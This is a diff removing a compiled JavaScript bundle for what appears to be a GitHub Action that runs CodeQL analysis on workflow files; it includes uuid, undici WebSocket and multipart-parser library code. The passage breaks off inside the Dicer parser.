get defaultValue () { - return [] - } - }, - { - key: 'dispatcher', - converter: (V) => V, - get defaultValue () { - return getGlobalDispatcher() - } - }, - { - key: 'headers', - converter: webidl.nullableConverter(webidl.converters.HeadersInit) - } -]) - -webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { - if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { - return webidl.converters.WebSocketInit(V) - } - - return { protocols: webidl.converters['DOMString or sequence'](V) } -} - -webidl.converters.WebSocketSendData = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { - return webidl.converters.BufferSource(V) - } - } - - return webidl.converters.USVString(V) -} - -module.exports = { - WebSocket -} - - -/***/ }), - -/***/ 5840: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -Object.defineProperty(exports, "v1", ({ - enumerable: true, - get: function () { - return _v.default; - } -})); -Object.defineProperty(exports, "v3", ({ - enumerable: true, - get: function () { - return _v2.default; - } -})); -Object.defineProperty(exports, "v4", ({ - enumerable: true, - get: function () { - return _v3.default; - } -})); -Object.defineProperty(exports, "v5", ({ - enumerable: true, - get: function () { - return _v4.default; - } -})); -Object.defineProperty(exports, "NIL", ({ - enumerable: true, - get: function () { - return _nil.default; - } -})); -Object.defineProperty(exports, "version", ({ - enumerable: true, - get: function () { - return _version.default; - } -})); -Object.defineProperty(exports, "validate", ({ - enumerable: true, - get: function () { - return _validate.default; - } -})); -Object.defineProperty(exports, "stringify", ({ - enumerable: true, - get: function () { 
- return _stringify.default; - } -})); -Object.defineProperty(exports, "parse", ({ - enumerable: true, - get: function () { - return _parse.default; - } -})); - -var _v = _interopRequireDefault(__nccwpck_require__(8628)); - -var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); - -var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); - -var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); - -var _nil = _interopRequireDefault(__nccwpck_require__(5332)); - -var _version = _interopRequireDefault(__nccwpck_require__(1595)); - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/***/ }), - -/***/ 4569: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function md5(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('md5').update(bytes).digest(); -} - -var _default = md5; -exports["default"] = _default; - -/***/ }), - -/***/ 5332: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = '00000000-0000-0000-0000-000000000000'; -exports["default"] = _default; - -/***/ }), - -/***/ 2746: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function parse(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - let v; - const arr = new Uint8Array(16); // Parse ########-....-....-....-............ - - arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; - arr[1] = v >>> 16 & 0xff; - arr[2] = v >>> 8 & 0xff; - arr[3] = v & 0xff; // Parse ........-####-....-....-............ - - arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; - arr[5] = v & 0xff; // Parse ........-....-####-....-............ - - arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; - arr[7] = v & 0xff; // Parse ........-....-....-####-............ 
- - arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; - arr[9] = v & 0xff; // Parse ........-....-....-....-############ - // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) - - arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; - arr[11] = v / 0x100000000 & 0xff; - arr[12] = v >>> 24 & 0xff; - arr[13] = v >>> 16 & 0xff; - arr[14] = v >>> 8 & 0xff; - arr[15] = v & 0xff; - return arr; -} - -var _default = parse; -exports["default"] = _default; - -/***/ }), - -/***/ 814: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; -exports["default"] = _default; - -/***/ }), - -/***/ 807: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = rng; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate - -let poolPtr = rnds8Pool.length; - -function rng() { - if (poolPtr > rnds8Pool.length - 16) { - _crypto.default.randomFillSync(rnds8Pool); - - poolPtr = 0; - } - - return rnds8Pool.slice(poolPtr, poolPtr += 16); -} - -/***/ }), - -/***/ 5274: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function sha1(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('sha1').update(bytes).digest(); -} - -var _default = sha1; -exports["default"] = _default; - -/***/ }), - -/***/ 8950: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -const byteToHex = []; - -for (let i = 0; i < 256; ++i) { - byteToHex.push((i + 0x100).toString(16).substr(1)); -} - -function stringify(arr, offset = 0) { - // Note: Be careful editing this code! It's been tuned for performance - // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 - const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. 
If this throws, it's likely due to one - // of the following: - // - One or more input array values don't map to a hex octet (leading to - // "undefined" in the uuid) - // - Invalid input values for the RFC `version` or `variant` fields - - if (!(0, _validate.default)(uuid)) { - throw TypeError('Stringified UUID is invalid'); - } - - return uuid; -} - -var _default = stringify; -exports["default"] = _default; - -/***/ }), - -/***/ 8628: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -// **`v1()` - Generate time-based UUID** -// -// Inspired by https://github.com/LiosK/UUID.js -// and http://docs.python.org/library/uuid.html -let _nodeId; - -let _clockseq; // Previous uuid creation time - - -let _lastMSecs = 0; -let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details - -function v1(options, buf, offset) { - let i = buf && offset || 0; - const b = buf || new Array(16); - options = options || {}; - let node = options.node || _nodeId; - let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not - // specified. We do this lazily to minimize issues related to insufficient - // system entropy. 
See #189 - - if (node == null || clockseq == null) { - const seedBytes = options.random || (options.rng || _rng.default)(); - - if (node == null) { - // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) - node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; - } - - if (clockseq == null) { - // Per 4.2.2, randomize (14 bit) clockseq - clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; - } - } // UUID timestamps are 100 nano-second units since the Gregorian epoch, - // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so - // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' - // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. - - - let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock - // cycle to simulate higher resolution clock - - let nsecs = options.nsecs !== undefined ? 
options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) - - const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression - - if (dt < 0 && options.clockseq === undefined) { - clockseq = clockseq + 1 & 0x3fff; - } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new - // time interval - - - if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { - nsecs = 0; - } // Per 4.2.1.2 Throw error if too many uuids are requested - - - if (nsecs >= 10000) { - throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); - } - - _lastMSecs = msecs; - _lastNSecs = nsecs; - _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch - - msecs += 12219292800000; // `time_low` - - const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; - b[i++] = tl >>> 24 & 0xff; - b[i++] = tl >>> 16 & 0xff; - b[i++] = tl >>> 8 & 0xff; - b[i++] = tl & 0xff; // `time_mid` - - const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; - b[i++] = tmh >>> 8 & 0xff; - b[i++] = tmh & 0xff; // `time_high_and_version` - - b[i++] = tmh >>> 24 & 0xf | 0x10; // include version - - b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) - - b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` - - b[i++] = clockseq & 0xff; // `node` - - for (let n = 0; n < 6; ++n) { - b[i + n] = node[n]; - } - - return buf || (0, _stringify.default)(b); -} - -var _default = v1; -exports["default"] = _default; - -/***/ }), - -/***/ 6409: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _md = _interopRequireDefault(__nccwpck_require__(4569)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -const v3 = (0, _v.default)('v3', 0x30, _md.default); -var _default = v3; -exports["default"] = _default; - -/***/ }), - -/***/ 5998: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = _default; -exports.URL = exports.DNS = void 0; - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function stringToBytes(str) { - str = unescape(encodeURIComponent(str)); // UTF8 escape - - const bytes = []; - - for (let i = 0; i < str.length; ++i) { - bytes.push(str.charCodeAt(i)); - } - - return bytes; -} - -const DNS = '6ba7b810-9dad-11d1-80b4-00c04fd430c8'; -exports.DNS = DNS; -const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; -exports.URL = URL; - -function _default(name, version, hashfunc) { - function generateUUID(value, namespace, buf, offset) { - if (typeof value === 'string') { - value = stringToBytes(value); - } - - if (typeof namespace === 'string') { - namespace = (0, _parse.default)(namespace); - } - - if (namespace.length !== 16) { - throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); - } // Compute hash of namespace and value, Per 4.3 - // Future: Use spread syntax when supported on all platforms, e.g. `bytes = - // hashfunc([...namespace, ... 
value])` - - - let bytes = new Uint8Array(16 + value.length); - bytes.set(namespace); - bytes.set(value, namespace.length); - bytes = hashfunc(bytes); - bytes[6] = bytes[6] & 0x0f | version; - bytes[8] = bytes[8] & 0x3f | 0x80; - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = bytes[i]; - } - - return buf; - } - - return (0, _stringify.default)(bytes); - } // Function#name is not settable on some platforms (#270) - - - try { - generateUUID.name = name; // eslint-disable-next-line no-empty - } catch (err) {} // For CommonJS default export support - - - generateUUID.DNS = DNS; - generateUUID.URL = URL; - return generateUUID; -} - -/***/ }), - -/***/ 5122: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function v4(options, buf, offset) { - options = options || {}; - - const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - - - rnds[6] = rnds[6] & 0x0f | 0x40; - rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = rnds[i]; - } - - return buf; - } - - return (0, _stringify.default)(rnds); -} - -var _default = v4; -exports["default"] = _default; - -/***/ }), - -/***/ 9120: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _sha = _interopRequireDefault(__nccwpck_require__(5274)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const v5 = (0, _v.default)('v5', 0x50, _sha.default); -var _default = v5; -exports["default"] = _default; - -/***/ }), - -/***/ 6900: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _regex = _interopRequireDefault(__nccwpck_require__(814)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function validate(uuid) { - return typeof uuid === 'string' && _regex.default.test(uuid); -} - -var _default = validate; -exports["default"] = _default; - -/***/ }), - -/***/ 1595: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function version(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - return parseInt(uuid.substr(14, 1), 16); -} - -var _default = version; -exports["default"] = _default; - -/***/ }), - -/***/ 950: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolcache = __importStar(__nccwpck_require__(7784)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newCodeQL() { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: core.getInput("packs").length > 0 ? 
core.getInput("packs") : undefined, - }; -} -exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd_arg) { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function findCodeQL() { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} -async function findCodeQlInToolcache() { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - return path.join(candidate.folder, "codeql"); - } - core.warning(`No CodeQL tools found in toolcache.`); - return undefined; -} -async function downloadPack(codeql) { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } - catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} -exports.downloadPack = downloadPack; -async function codeqlDatabaseCreate(codeql) { - // get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; 
- if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - return database_path; -} -exports.codeqlDatabaseCreate = codeqlDatabaseCreate; -async function codeqlDatabaseAnalyze(codeql, database_path) { - var codeql_output = codeql.output || "codeql-actions.sarif"; - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } - else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - cmd.push(database_path, suite); - await runCommand(codeql, cmd); - return codeql_output; -} -exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; - - -/***/ }), - -/***/ 6144: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.run = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const cql = __importStar(__nccwpck_require__(950)); -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -async function run() { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - core.debug(`CodeQL CLI found at '${codeql.path}'`); - await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } - else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, 
database_path); - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - core.info("Finished CodeQL analysis"); - } - catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) - core.setFailed(error.message); - } -} -exports.run = run; -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); - - -/***/ }), - -/***/ 9491: -/***/ ((module) => { - -"use strict"; -module.exports = require("assert"); - -/***/ }), - -/***/ 852: -/***/ ((module) => { - -"use strict"; -module.exports = require("async_hooks"); - -/***/ }), - -/***/ 4300: -/***/ ((module) => { - -"use strict"; -module.exports = require("buffer"); - -/***/ }), - -/***/ 2081: -/***/ ((module) => { - -"use strict"; -module.exports = require("child_process"); - -/***/ }), - -/***/ 6206: -/***/ ((module) => { - -"use strict"; -module.exports = require("console"); - -/***/ }), - -/***/ 6113: -/***/ ((module) => { - -"use strict"; -module.exports = require("crypto"); - -/***/ }), - -/***/ 7643: -/***/ ((module) => { - -"use strict"; -module.exports = require("diagnostics_channel"); - -/***/ }), - -/***/ 2361: -/***/ ((module) => { - -"use strict"; -module.exports = require("events"); - -/***/ }), - -/***/ 7147: -/***/ ((module) => { - -"use strict"; -module.exports = require("fs"); - -/***/ }), - -/***/ 3685: -/***/ ((module) => { - -"use strict"; -module.exports = require("http"); - -/***/ }), - -/***/ 5158: -/***/ ((module) => { - -"use strict"; -module.exports = require("http2"); - -/***/ }), - -/***/ 5687: -/***/ ((module) => { - -"use strict"; -module.exports = require("https"); - -/***/ }), - -/***/ 1808: -/***/ ((module) => { - -"use strict"; -module.exports = require("net"); - -/***/ }), - -/***/ 5673: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:events"); - -/***/ }), - -/***/ 4492: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:stream"); - -/***/ }), - -/***/ 7261: -/***/ ((module) 
=> { - -"use strict"; -module.exports = require("node:util"); - -/***/ }), - -/***/ 2037: -/***/ ((module) => { - -"use strict"; -module.exports = require("os"); - -/***/ }), - -/***/ 1017: -/***/ ((module) => { - -"use strict"; -module.exports = require("path"); - -/***/ }), - -/***/ 4074: -/***/ ((module) => { - -"use strict"; -module.exports = require("perf_hooks"); - -/***/ }), - -/***/ 3477: -/***/ ((module) => { - -"use strict"; -module.exports = require("querystring"); - -/***/ }), - -/***/ 2781: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream"); - -/***/ }), - -/***/ 5356: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream/web"); - -/***/ }), - -/***/ 1576: -/***/ ((module) => { - -"use strict"; -module.exports = require("string_decoder"); - -/***/ }), - -/***/ 9512: -/***/ ((module) => { - -"use strict"; -module.exports = require("timers"); - -/***/ }), - -/***/ 4404: -/***/ ((module) => { - -"use strict"; -module.exports = require("tls"); - -/***/ }), - -/***/ 7310: -/***/ ((module) => { - -"use strict"; -module.exports = require("url"); - -/***/ }), - -/***/ 3837: -/***/ ((module) => { - -"use strict"; -module.exports = require("util"); - -/***/ }), - -/***/ 9830: -/***/ ((module) => { - -"use strict"; -module.exports = require("util/types"); - -/***/ }), - -/***/ 1267: -/***/ ((module) => { - -"use strict"; -module.exports = require("worker_threads"); - -/***/ }), - -/***/ 9796: -/***/ ((module) => { - -"use strict"; -module.exports = require("zlib"); - -/***/ }), - -/***/ 2960: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const inherits = (__nccwpck_require__(7261).inherits) - -const StreamSearch = __nccwpck_require__(1142) - -const PartStream = __nccwpck_require__(1620) -const HeaderParser = __nccwpck_require__(2032) - -const DASH = 45 -const B_ONEDASH = Buffer.from('-') -const B_CRLF = 
Buffer.from('\r\n') -const EMPTY_FN = function () {} - -function Dicer (cfg) { - if (!(this instanceof Dicer)) { return new Dicer(cfg) } - WritableStream.call(this, cfg) - - if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } - - if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } - - this._headerFirst = cfg.headerFirst - - this._dashes = 0 - this._parts = 0 - this._finished = false - this._realFinish = false - this._isPreamble = true - this._justMatched = false - this._firstWrite = true - this._inHeader = true - this._part = undefined - this._cb = undefined - this._ignoreData = false - this._partOpts = { highWaterMark: cfg.partHwm } - this._pause = false - - const self = this - this._hparser = new HeaderParser(cfg) - this._hparser.on('header', function (header) { - self._inHeader = false - self._part.emit('header', header) - }) -} -inherits(Dicer, WritableStream) - -Dicer.prototype.emit = function (ev) { - if (ev === 'finish' && !this._realFinish) { - if (!this._finished) { - const self = this - process.nextTick(function () { - self.emit('error', new Error('Unexpected end of multipart data')) - if (self._part && !self._ignoreData) { - const type = (self._isPreamble ? 'Preamble' : 'Part') - self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) - self._part.push(null) - process.nextTick(function () { - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - return - } - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - } - } else { WritableStream.prototype.emit.apply(this, arguments) } -} - -Dicer.prototype._write = function (data, encoding, cb) { - // ignore unexpected data (e.g. 
extra trailer data after finished) - if (!this._hparser && !this._bparser) { return cb() } - - if (this._headerFirst && this._isPreamble) { - if (!this._part) { - this._part = new PartStream(this._partOpts) - if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } - } - const r = this._hparser.push(data) - if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } - } - - // allows for "easier" testing - if (this._firstWrite) { - this._bparser.push(B_CRLF) - this._firstWrite = false - } - - this._bparser.push(data) - - if (this._pause) { this._cb = cb } else { cb() } -} - -Dicer.prototype.reset = function () { - this._part = undefined - this._bparser = undefined - this._hparser = undefined -} - -Dicer.prototype.setBoundary = function (boundary) { - const self = this - this._bparser = new StreamSearch('\r\n--' + boundary) - this._bparser.on('info', function (isMatch, data, start, end) { - self._oninfo(isMatch, data, start, end) - }) -} - -Dicer.prototype._ignore = function () { - if (this._part && !this._ignoreData) { - this._ignoreData = true - this._part.on('error', EMPTY_FN) - // we must perform some kind of read on the stream even though we are - // ignoring the data, otherwise node's Readable stream will not emit 'end' - // after pushing null to the stream - this._part.resume() - } -} - -Dicer.prototype._oninfo = function (isMatch, data, start, end) { - let buf; const self = this; let i = 0; let r; let shouldWriteMore = true - - if (!this._part && this._justMatched && data) { - while (this._dashes < 2 && (start + i) < end) { - if (data[start + i] === DASH) { - ++i - ++this._dashes - } else { - if (this._dashes) { buf = B_ONEDASH } - this._dashes = 0 - break - } - 